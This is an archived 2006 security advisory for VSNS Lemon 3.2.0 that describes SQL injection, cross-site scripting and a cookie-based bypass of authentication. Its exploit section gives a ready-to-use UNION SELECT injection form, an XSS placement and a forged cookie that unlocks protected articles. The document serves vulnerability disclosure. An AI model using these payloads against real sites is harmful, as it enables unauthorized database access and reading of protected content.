Multiple Vulnerabilities in VSNS Lemon
Summary
- Vulnerability
- Multiple Vulnerabilities in VSNS Lemon
- Discovered
- 2006.03.27
- Last Update
- 2006.04.06 Exploitation code published
- ID
- EV0106
- CVE
- CVE-2006-1553 CVE-2006-1554 CVE-2006-1555
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- Tachyon (http://tachyondecay.net/)
- Vulnerable Software
- VSNS Lemon
- Version
- 3.2.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in VSNS Lemon script.
1. SQL Injection.
Vulnerable script: functions/final_functions.php
Variable $id is not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
2. Cross-Site Scripting.
Adding comment form. Parameter 'name' is not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
3. Cookie-Based Authentication Bypass.
There is a possibility to bypass authentication for pasword-protected articles. Password-checking function dont make password comparisson, just check cookie value for existance.
PoC/Exploit
1. SQL Injection Example.
- <form method="post" action="http://[host]/vsns/index.php">
- <input type="hidden" name="towel" value="checkpass">
- <input name="id" value="9999' union select 123,4,5,6/*">
- <input type="password" name="password" value="123">
- <input type="submit" value="Go">
- </form>
2. Cross-Site Scripting Example
Add Comment.
Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display
Name: [XSS]
3. Authentication Bypass Example.
Read any password-protected topic:
Cookie: vsns[topic_id] = 1
Solution.
Solution for "Multiple Vulnerabilities in VSNS Lemon" is not available. Check Tachyon website for updates.